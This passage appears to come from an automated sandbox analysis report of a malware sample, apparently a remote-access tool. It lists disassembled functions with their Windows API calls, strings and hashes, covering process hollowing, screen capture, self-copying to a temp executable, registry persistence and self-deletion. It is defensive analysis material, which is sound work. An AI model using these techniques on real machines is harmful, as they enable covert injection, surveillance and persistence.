                                                    • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                    Function 0044D5F9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$Zb1Y/
                                                    • API String ID: 0-2556323486
                                                    • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                    • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                    • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                    • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                    Function 004475A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: GetLocaleInfoEx$Zb1Y/
                                                    • API String ID: 2299586839-3498089611
                                                    • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                    • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                    • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                    • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                    Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                    • String ID:
                                                    • API String ID: 1815803762-0
                                                    • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                    • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                    • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                    • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                    Function 004510CA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1663032902-3232713500
                                                    • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                    • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                    • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                    • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                    Function 004470BE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                    • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1272433827-3232713500
                                                    • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                    • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                    • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                    • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                    Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                    • String ID:
                                                    • API String ID: 1084509184-0
                                                    • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                    • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                    • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                    • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                    Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                    • String ID:
                                                    • API String ID: 2692324296-0
                                                    • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                    • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                    • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                    • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                    Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                    • String ID:
                                                    • API String ID: 1084509184-0
                                                    • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                    • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                    • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                    • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                    Function 0041A7B2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                    • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                    • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                    • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                    Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                    • String ID:
                                                    • API String ID: 1084509184-0
                                                    • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                    • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                    • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                    • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                    Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                    • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                    • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                    • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                    Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: recv
                                                    • String ID:
                                                    • API String ID: 1507349165-0
                                                    • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                    • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                    • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                    • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                    Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                      • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                    • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                    • DeleteDC.GDI32(?), ref: 0041806D
                                                    • DeleteDC.GDI32(00000000), ref: 00418070
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                    • GetIconInfo.USER32(?,?), ref: 004180DB
                                                    • DeleteObject.GDI32(?), ref: 0041810A
                                                    • DeleteObject.GDI32(?), ref: 00418117
                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                    • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                    • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                    • DeleteDC.GDI32(?), ref: 0041828F
                                                    • DeleteDC.GDI32(00000000), ref: 00418292
                                                    • DeleteObject.GDI32(00000000), ref: 00418295
                                                    • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                    • DeleteObject.GDI32(00000000), ref: 00418354
                                                    • GlobalFree.KERNEL32(?), ref: 0041835B
                                                    • DeleteDC.GDI32(?), ref: 0041836B
                                                    • DeleteDC.GDI32(00000000), ref: 00418376
                                                    • DeleteDC.GDI32(?), ref: 004183A8
                                                    • DeleteDC.GDI32(00000000), ref: 004183AB
                                                    • DeleteObject.GDI32(?), ref: 004183B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                    • String ID: DISPLAY
                                                    • API String ID: 1765752176-865373369
                                                    • Opcode ID: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                    • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                    • Opcode Fuzzy Hash: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                    • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                    Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                    • ResumeThread.KERNEL32(?), ref: 00417582
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                    • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                    • GetLastError.KERNEL32 ref: 004175C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                    • API String ID: 4188446516-3035715614
                                                    • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                    • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                    • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                    • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                    Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                    • ExitProcess.KERNEL32 ref: 0041151D
                                                      • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                      • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                      • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                    • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                    • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                    • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                      • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                      • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                      • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                    • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                      • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                    • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                    • API String ID: 4250697656-2665858469
                                                    • Opcode ID: 1619ae0a5cb8ddddf3ff04ab525500410f40dd57126bdc10f07f9034603f2ec7
                                                    • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                    • Opcode Fuzzy Hash: 1619ae0a5cb8ddddf3ff04ab525500410f40dd57126bdc10f07f9034603f2ec7
                                                    • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                    Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                      • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                    • ExitProcess.KERNEL32 ref: 0040C63E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
